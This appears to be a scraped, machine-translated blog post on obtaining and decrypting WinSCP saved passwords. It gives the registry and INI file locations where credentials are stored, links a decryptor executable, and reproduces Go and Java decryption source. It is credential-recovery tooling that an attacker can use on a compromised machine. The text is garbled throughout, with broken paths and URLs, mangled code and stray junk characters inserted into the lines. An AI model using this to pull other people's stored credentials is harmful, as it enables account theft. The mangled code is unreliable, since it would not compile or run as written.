Obtain and decrypt Winscp passwords
By default, WINSCP saves the user password in the following location in the registry:
HKEY_USERS \ SID \ Software \ Martin Prikryl \ WinSCP 2 \ Sessions \
However, in WIN7 \ 8, the default WinSCP path is:
C: \ Users \ USERNAME \ AppData \ Local \ VirtualStore \ Program Files (x86) \ WinSCP. ini (64-bit operating system)
C: \ Program Files (x86) \ WinSCP. ini (64-bit operating system)
C: \ Users \ USERNAME \ AppData \ Local \ VirtualStore \ Program Files \ WinSCP. ini (32-bit Operating System)-Focus on network security 2 p % t + \ * j $ r-
C: \ Program Files \ WinSCP. ini (32-bit operating system)
This is the earliest thing in our memory.
Https://bitbucket.org/knarf/winscppwd/overview/ s, u + I + P0 n3 m :[
Download from source code and compiled programs
Https://bitbucket.org/knarf/winscppwd/downloads/winscppwd.exe
There is also a GO Language
Https://github.com/anoopengineer/winscppasswd/blob/master/main.go
Package mainimport ("fmt" "OS" "runtime" "strconv") const (PW_MAGIC = 0xA3 PW_FLAG = 0xFF) func main () {args: = OS. args [1:] if len (args )! = 3 {fmt. println ("WinSCP stored password finder") fmt. println ("Open regedit and navigate to [HKEY_CURRENT_USER \ Software \ Martin Prikryl \ WinSCP 2 \ Sessions] to get the hostname, username and encrypted password \ n ") if runtime. GOOS = "windows" {fmt. println ("Usage winscppasswd.exe")} else {fmt. printf ("Usage. /winscppasswd ")} return} fmt. println (decrypt (args [0], args [1], args [2])} func decrypt (host, username, password string) string {key: = username + host passbytes: = [] byte {} for I: = 0; I len (password); I ++ {val, _: = strconv. parseInt (string (password [I]), 16, 8) passbytes = append (passbytes, byte (val)} var flag byte flag, passbytes = dec_next_char (passbytes) var length byte = 0 if flag = PW_FLAG {_, passbytes = dec_next_char (passbytes) length, passbytes = dec_next_char (passbytes)} else {length = flag} second, passbytes: = dec_next_char (passbytes) passbytes = passbytes [toBeDeleted * 2:] clearpass: = "" var (I byte val byte) for I = 0; I length; I ++ {val, passbytes = dec_next_char (passbytes) clearpass ++ = string (val)} if flag = PW_FLAG {clearpass = clearpass [len (key):]} return clearpass} func dec_next_char (passbytes [] byte) (byte, [] byte) {if len (passbytes) 0 {return 0, passbytes} a: = passbytes [0] B: = passbytes [1] passbytes = passbytes [2:] return ^ (a 4) + B) ^ PW_MAGIC) & 0xff, passbytes} attaches a java https://github.com/YuriMB/WinSCP-Password-Recovery/blob/master/src/main/java/Main.javaimport Java. util. arrayList; import java. util. list;/*** Created by Yuri Meiburg on 30-4-2015. */public class Main {/***. /core/Security. h: # define PWALG_SIMPLE_FLAG 0xFF */public static final int PWALG_SIMPLE_FLAG = 0xFF ;/***. /core/Security. h: # define PWALG_SIMPLE_MAGIC 0xA3 */public static final char PWALG_SIMPLE_MAGIC = 0xA3; public static ListCharacter> fPassword = new ArrayListCharacter> (); public s Tatic String hostname, username; public static void main (String [] args) {if (args. length! = 3) {System. exit (0);} hostname = args [0]; username = args [1]; for (int I = 0; I args [2]. length (); ++ I) {fPassword. add (char) Integer. parseInt ("" + args [2]. charAt (I), 16);} System. out. println ("username =" + username); System. out. println ("hostname =" + hostname); System. out. println ("getPassword () =" + getPassword ();}/*** UnicodeString _ fastcall TSessionData: GetPassword () const {return Decry PtPassword (FPassword, UserName + HostName);} */static String getPassword () {return decryptPassword (fPassword, username + hostname);}/*** UnicodeString DecryptPassword (RawByteString Password, unicodeString UnicodeKey, Integer) * {* UTF8String Key = UnicodeKey; * UTF8String Result (""); * Integer Index; * unsigned char Length, Flag; ** Flag = simpleDecryptNextChar (Password); * if (Flag = PWALG _ SIMPLE_FLAG) * {* simpleDecryptNextChar (Password); * Length = simpleDecryptNextChar (Password); *} * else Length = Flag; * Password. delete (1, (Integer) simpleDecryptNextChar (Password) * 2); * for (Index = 0; Index * Result + = (char) simpleDecryptNextChar (Password ); * if (Flag = PWALG_SIMPLE_FLAG) * {* if (Result. subString (1, Key. length ())! = Key) Result = ""; * else Result. delete (1, Key. length (); *} * return UnicodeString (Result); *} */static String decryptPassword (ListCharacter> password, String unicodeKey) {System. out. println ("unicodeKey =" + unicodeKey); String key = unicodeKey; String result = ""; char length, flag; flag = simpleDecryptNextChar (password); System. out. println ("flag =" + (int) flag); if (flag = PWALG_SIMPLE_FLA G) {/* Dummy = */simpleDecryptNextChar (password); length = simpleDecryptNextChar (password);} else length = flag; System. out. println ("length =" + (int) length); int newStart = (int) simpleDecryptNextChar (password) * 2); System. out. println ("newStart =" + newStart + ", password. size () = "+ password. size (); removeItems (password, 0, newStart); for (int index = 0; index length; ++ index) result + = simpl EDecryptNextChar (password); System. out. println ("result =" + result); if (flag = PWALG_SIMPLE_FLAG) {if (! Result. substring (0, key. length ()). equals (key) result = ""; else result = result. substring (key. length ();} return result;}/*** unsigned char simpleDecryptNextChar (RawByteString & Str) {if (Str. length ()> 0) {unsigned char Result = (unsigned char )~ (PWALG_SIMPLE_STRING.Pos (Str. c_str () [0])-1) (PWALG_SIMPLE_STRING.Pos (Str. c_str () [1])-1) Str. delete (1, 2); return Result;} else return 0x00;} * @ param str * @ return */static public char simpleDecryptNextChar (ListCharacter> str) {if (str. size ()> 0) {char result = unsignedChar (~ (UnsignedChar (str. get (0) 4) + str. get (1) // Remove bitshift overflow bits .) ^ PWALG_SIMPLE_MAGIC); removeItems (str, 0, 2); return result;} else return 0x00;}/*** Cut off anything over 255. * @ param v * @ return */static char unsignedChar (int v) {return (char) (v & 0xFF );} /*** Remove items from list */static void removeItems (List lst, int start, int end) {for (int I = 0; iend-start; ++ I) {lst. remove (start );}}}